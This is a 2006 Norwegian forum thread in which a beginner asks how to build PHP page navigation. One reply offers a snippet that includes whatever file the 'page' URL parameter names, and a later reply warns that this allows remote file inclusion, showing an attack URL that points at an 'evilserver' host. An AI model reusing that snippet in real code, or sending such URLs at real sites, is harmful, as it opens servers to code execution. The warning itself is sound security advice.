rotgut Skrevet 28. mai 2006 Del Skrevet 28. mai 2006 Jeg har googla meg ihjel i det siste, men ser ikke ut til å finne det jeg er på jakt etter Kan noen være så snill og veilede meg eller finne en enkelt tutorial for nybegynnere (helt fra scratch) hvordan man enkelt og greit lager en sidenavigasjon i PHP? Som f.eks fungerer som denne: nexon.moo.no Ikkenoe fancy greier, bare et navigasjonssytem som, når jeg trykker på en link, endrer teksten i et visst felt. Takk! Lenke til kommentar
iChristian Skrevet 28. mai 2006 Del Skrevet 28. mai 2006 (endret) På denne siden så er det faktisk en helt standard HTML-meny. Hvis du ser på adressefeltet så åpnes det en helt ny fil for hver gang man trykker på noe Men du tenker på et system hvor du bare har en fil til selve utseendet og innholdet og hvor teksten i et av feltene endres ved at du trykker på en link som kan ligne på /?side=forside og lignende? Eller har jeg misforstått deg? Endret 28. mai 2006 av Lomz Lenke til kommentar
rotgut Skrevet 28. mai 2006 Forfatter Del Skrevet 28. mai 2006 (endret) På denne siden så er det faktisk en helt standard HTML-meny.Hvis du ser på adressefeltet så åpnes det en helt ny fil for hver gang man trykker på noe Men du tenker på et system hvor du bare har en fil til selve utseendet og innholdet og hvor teksten i et av feltene endres ved at du trykker på en link som kan ligne på /?side=forside og lignende? Eller har jeg misforstått deg? 6193488[/snapback] Heisann! Takk for raskt svar, jeg vet vel egentlig ikke helt hva jeg er ute etter, men etter litt søking på nettet blir man nærmest offentlig lynsjet om man forsøker seg på "gode" gamle frames. Jeg må med andre ord ha et moderne navigasjonssystem, ala dette: eksempel Endret 28. mai 2006 av rotgut Lenke til kommentar
Ernie Skrevet 28. mai 2006 Del Skrevet 28. mai 2006 Fortsatt helt vanlig html Hva er det du egentlig skal ha? Du klarer det utmerket bra med html og css så lenge du ikke vil eller skal ha ting dynamisk. Lenke til kommentar
stian90_2 Skrevet 28. mai 2006 Del Skrevet 28. mai 2006 hmm, han trenger vel et include script om jeg ikke tar helt feil. sett denne koden der du vil at alle sidene du trykker på skal komme opp $page = $_GET["page"]; if(!empty($page)) include("$page.php"); else echo "Forsiden eller noe slikt"; så skriver du index.php?page=forside for og vise forsiden eller ?page=forside Lenke til kommentar
rotgut Skrevet 28. mai 2006 Forfatter Del Skrevet 28. mai 2006 Ok, så det er ikke "ut" å kopiere samme side og linke til disse, for så å endre tekstfeltet ? Trodde dette var litt utdatert og at det var enklere måter å gjøre det på. Er php innført for å gjøre det enklere å endre innholdet på siden? Om jeg skal skrive reiserapport f.eks blir jeg nødt til å åpne HTML filen og gjøre endringer. Kanskje jeg kan forsøke å lage et php script kun jeg har tilgang til som slenger teksten inn? Takker for svar. Lenke til kommentar
Ernie Skrevet 28. mai 2006 Del Skrevet 28. mai 2006 Ok, så det er ikke "ut" å kopiere samme side og linke til disse, for så å endre tekstfeltet ? Trodde dette var litt utdatert og at det var enklere måter å gjøre det på. Er php innført for å gjøre det enklere å endre innholdet på siden? Om jeg skal skrive reiserapport f.eks blir jeg nødt til å åpne HTML filen og gjøre endringer. Kanskje jeg kan forsøke å lage et php script kun jeg har tilgang til som slenger teksten inn? Takker for svar. 6196334[/snapback] PHP er "innført" fordi noen ville ha et språk til bruk på web hvor koden for selve tolkingen av scriptene er opensource. Hensikten er å ha dynamiske sider. Hvis du f.eks skal skrive reiserapporter så kan det være en meget god ide å bruke litt php ja. Online editor med pålogging i backend og lagring av dataene enten i filer eller database og et frontend som henter de inn og viser de. Lenke til kommentar
ZoRaC Skrevet 28. mai 2006 Del Skrevet 28. mai 2006 (endret) $page = $_GET["page"]; if(!empty($page)) include("$page.php"); else echo "Forsiden eller noe slikt"; http://www.dinserver.no/scriptet.php?page=http://www.evilserver.com/hackertool.txt? så er du ille ute! Bare så trådstarter er klar over det, slik at han ikke bare kopierer inn den koden og bruker den uten noe mer "sjekking"... Endret 28. mai 2006 av ZoRaC Lenke til kommentar
iChristian Skrevet 29. mai 2006 Del Skrevet 29. mai 2006 (endret) $page = $_GET["page"]; if(!empty($page)) include("$page.php"); else echo "Forsiden eller noe slikt"; http://www.dinserver.no/scriptet.php?page=http://www.evilserver.com/hackertool.txt? så er du ille ute! Bare så trådstarter er klar over det, slik at han ikke bare kopierer inn den koden og bruker den uten noe mer "sjekking"... 6198947[/snapback] Strengt tatt så ville det i dette eksempelet føre til at den fikk en 404, siden jeg tviler på at hackeren har kalt fila si for hackertools.txt.php Men et poeng eller flere, det er det ingen tvil om at du har Endret 29. mai 2006 av Lomz Lenke til kommentar
ZoRaC Skrevet 29. mai 2006 Del Skrevet 29. mai 2006 Derfor .....txt? for da blir .php sendt som en GET-variabel til hackertool-fila... Et av scriptene jeg har lagt ut for "offentligheten" ble nylig exploitet på omtrent samme måte... Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå